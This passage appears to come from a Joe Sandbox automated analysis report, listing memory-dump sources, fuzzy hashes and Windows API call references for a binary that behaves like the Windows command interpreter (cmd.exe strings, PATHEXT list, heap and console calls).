                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$_setjmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 3883041866-0
                                                                                                          • Opcode ID: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                                          • Instruction ID: 67abfed8474dbeb56b5977c610b0067f174b864d63b767495f9727306f9dbbfd
                                                                                                          • Opcode Fuzzy Hash: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                                          • Instruction Fuzzy Hash: 6D519032609B86CAEB62DF28E8403E9B3A4FB4974CF814135DA4D47A68DF3CD644CB50
                                                                                                          APIs
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB12B4BD
                                                                                                            • Part of subcall function 00007FF7AB1306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306D6
                                                                                                            • Part of subcall function 00007FF7AB1306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306F0
                                                                                                            • Part of subcall function 00007FF7AB1306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB13074D
                                                                                                            • Part of subcall function 00007FF7AB1306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB130762
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB12B518
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB12B58B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                          • String ID: ELSE$IF/?
                                                                                                          • API String ID: 3223794493-1134991328
                                                                                                          • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                          • Instruction ID: b4b62f9743cb5160e610794e5d42d3ab61ae9b845c1e834275842a910d89e095
                                                                                                          • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                          • Instruction Fuzzy Hash: 9F418A21E0B643C1FB56BB2CF4912BAA2A1AF44748FDA4435D60E072B5EE3DE8448760
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 1532185241-0
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3588551418-0
                                                                                                          Similarity
                                                                                                          • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 2123716050-0
                                                                                                          Similarity
                                                                                                          • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3114114779-0
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A77A
                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A7AF
                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A80E
                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A839
                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A850
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue$CloseErrorLastOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2240656346-0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB1301B8: _get_osfhandle.MSVCRT ref: 00007FF7AB1301C4
                                                                                                            • Part of subcall function 00007FF7AB1301B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7AB13E904,?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB1301D6
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7AB14D0F9
                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7AB14D10F
                                                                                                          • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7AB14D166
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7AB14D17A
                                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7AB14D18C
                                                                                                          Similarity
                                                                                                          • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3008996577-0
                                                                                                          Similarity
                                                                                                          • API ID: CreateSemaphore
                                                                                                          • String ID: _p0$wil
                                                                                                          • API String ID: 1078844751-1814513734
                                                                                                          APIs
                                                                                                          • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF7AB14B934
                                                                                                          • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7AB135085), ref: 00007FF7AB14B9A5
                                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7AB135085), ref: 00007FF7AB14B9F7
                                                                                                          Similarity
                                                                                                          • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                          • String ID: %WINDOWS_COPYRIGHT%
                                                                                                          • API String ID: 1103618819-1745581171
                                                                                                          Similarity
                                                                                                          • API ID: memset$_wcslwr
                                                                                                          • String ID: [%s]
                                                                                                          • API String ID: 886762496-302437576
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB1333A8: iswspace.MSVCRT(?,?,00000000,00007FF7AB14D6EE,?,?,?,00007FF7AB140632), ref: 00007FF7AB1333C0
                                                                                                          • iswspace.MSVCRT(?,?,?,00007FF7AB1332A4), ref: 00007FF7AB13331C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: iswspace
                                                                                                          • String ID: off
                                                                                                          • API String ID: 2389812497-733764931
                                                                                                          • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                          • Instruction ID: bf99df712462ed68350412bcd18d303f19c7054b171c9514e7085e9de737bc3e
                                                                                                          • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                          • Instruction Fuzzy Hash: 5221B221E0E64281FAAA7B1DF451279E690FF45B88FDAD134D90E476B0EF2CE5488325
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                          • String ID: %s=%s$DPATH$PATH
                                                                                                          • API String ID: 3731854180-3148396303
                                                                                                          • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                                          • Instruction ID: 52eb5630756f65305e382a3016376172bbdf3b35c429782c2e3527247026214e
                                                                                                          • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                                          • Instruction Fuzzy Hash: 9821C561B0B64285FA56AB2DF480279A3A0AFC1BC8FC68135C90E473B4FE3CE5448360
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcscmp
                                                                                                          • String ID: *.*$????????.???
                                                                                                          • API String ID: 3392835482-3870530610
                                                                                                          • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                          • Instruction ID: c2ae2cd359e24ec2444e90a18d040f3b4858a4ef67765b7c9ab97e126a9d5fe6
                                                                                                          • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                          • Instruction Fuzzy Hash: 4B11EC29B15A5281E7A9AF2AF440139B7A0FB44B84F5A5030CE4D47775EE3DE441C710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: fprintf
                                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                          • API String ID: 383729395-2781220306
                                                                                                          • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                          • Instruction ID: 7efa7412708c4475bc301aa16b60e94dd4ed1695ee7cc9a5d6cdb646dbe52e31
                                                                                                          • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                          • Instruction Fuzzy Hash: F6116D6190A642C5EA56AB1CF9400B9A261EB45BF8FC69331D67E432F4BF2CA4858360
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: iswspacewcschr
                                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                                                                          • API String ID: 287713880-1183017076
                                                                                                          • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                          • Instruction ID: 21b945233a650d46c54d8d18057cd17d06190d5404fc315f8fc326cf345467fe
                                                                                                          • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                          • Instruction Fuzzy Hash: E7F03121A1A652C1EAAA9B09F444279F6D0BF45B48BC79171D95E43274FF2CD448C720
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                          • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                                          • API String ID: 1646373207-2530943252
                                                                                                          • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                          • Instruction ID: e2f0a8ee87b09dd26c0c39adb2910c4f5c23e842aece980b96ec8c6c7aa43abc
                                                                                                          • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                          • Instruction Fuzzy Hash: 37011E20E0BA06C1EA8AA71DF891134A2A0EF49738FC60735C53E027F0EE3C64859320
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                          • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                          • API String ID: 1646373207-919018592
                                                                                                          • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                          • Instruction ID: 55a6e5f289a37a147745bebc8e4648ae44375e3164dbfa1bb1a7601c7ac5f7e2
                                                                                                          • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                          • Instruction Fuzzy Hash: D4F03062B1978192E6066B1AF484079FB60FF89BD4B899634DA4E03734DF3CD485C710
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$CurrentDirectorytowupper
                                                                                                          • String ID:
                                                                                                          • API String ID: 1403193329-0
                                                                                                          • Opcode ID: 8f12ec0cfcd936a987ebeb0b3721ecca5b9c81898bdfe4a19f372ac06b3fdf31
                                                                                                          • Instruction ID: f484e7fd1b5bde941f857ca0ce7f45721ff154ef6d1a4abcd4e3cc99f9964e91
                                                                                                          • Opcode Fuzzy Hash: 8f12ec0cfcd936a987ebeb0b3721ecca5b9c81898bdfe4a19f372ac06b3fdf31
                                                                                                          • Instruction Fuzzy Hash: 2761B032A19B82CAEB65EB29E8402ADB7A4FB4474CF914235DE5D037B9EF38D454C710
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsnicmp$wcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 3270668897-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: memset$DriveFullNamePathType
                                                                                                          • String ID:
                                                                                                          • API String ID: 3442494845-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                          • String ID:
                                                                                                          • API String ID: 140117192-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: wcstol$lstrcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 3515581199-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: File_get_osfhandle$TimeWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 4019809305-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: memset$DriveNamePathTypeVolume
                                                                                                          • String ID:
                                                                                                          • API String ID: 1029679093-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 2448200120-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 1617791916-0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB133C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7AB133D0C
                                                                                                            • Part of subcall function 00007FF7AB133C24: towupper.MSVCRT ref: 00007FF7AB133D2F
                                                                                                            • Part of subcall function 00007FF7AB133C24: iswalpha.MSVCRT ref: 00007FF7AB133D4F
                                                                                                            • Part of subcall function 00007FF7AB133C24: towupper.MSVCRT ref: 00007FF7AB133D75
                                                                                                            • Part of subcall function 00007FF7AB133C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB133DBF
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB14EA0F,?,?,?,00007FF7AB14E925,?,?,?,?,00007FF7AB12B9B1), ref: 00007FF7AB126ABF
                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF7AB126AD3
                                                                                                            • Part of subcall function 00007FF7AB126B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF7AB126AE8,?,?,?,00007FF7AB14EA0F,?,?,?,00007FF7AB14E925), ref: 00007FF7AB126B8B
                                                                                                            • Part of subcall function 00007FF7AB126B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF7AB126AE8,?,?,?,00007FF7AB14EA0F,?,?,?,00007FF7AB14E925), ref: 00007FF7AB126B97
                                                                                                            • Part of subcall function 00007FF7AB126B84: RtlFreeHeap.NTDLL ref: 00007FF7AB126BAF
                                                                                                            • Part of subcall function 00007FF7AB126B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB126AF1,?,?,?,00007FF7AB14EA0F,?,?,?,00007FF7AB14E925), ref: 00007FF7AB126B39
                                                                                                            • Part of subcall function 00007FF7AB126B30: RtlFreeHeap.NTDLL ref: 00007FF7AB126B4D
                                                                                                            • Part of subcall function 00007FF7AB126B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB126AF1,?,?,?,00007FF7AB14EA0F,?,?,?,00007FF7AB14E925), ref: 00007FF7AB126B59
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB14EA0F,?,?,?,00007FF7AB14E925,?,?,?,?,00007FF7AB12B9B1), ref: 00007FF7AB126B03
                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF7AB126B17
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                                          • String ID:
                                                                                                          • API String ID: 3512109576-0
                                                                                                          APIs
